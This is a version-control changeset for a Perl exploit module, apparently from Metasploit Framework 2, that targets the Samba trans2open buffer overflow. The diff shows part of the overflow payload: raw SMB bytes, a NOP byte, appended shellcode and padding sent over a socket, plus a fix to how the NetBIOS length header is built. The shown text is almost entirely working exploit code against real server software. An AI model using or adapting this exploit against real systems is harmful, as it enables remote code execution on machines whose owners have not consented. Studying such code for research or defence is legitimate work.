Changeset 4062
- Timestamp:
- 10/28/06 11:41:46 (2 years ago)
- Files:
-
- framework2/trunk/exploits/samba_trans2open.pm (modified) (3 diffs)
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework2/trunk/exploits/samba_trans2open.pm
r3818 r4062 191 191 192 192 my $Overflow = 193 "\x 00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".193 "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00". 194 194 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". 195 195 "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00". … … 198 198 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"; 199 199 200 201 200 202 $Overflow .= $shellcode; 201 203 $Overflow .= "A" x 297; … … 210 212 } 211 213 214 $Overflow = pack('CCn', 0, 0, length($Overflow)) . $Overflow; 215 212 216 $s->Send($Overflow); 213 217 $s->Send("\x00" x 810);
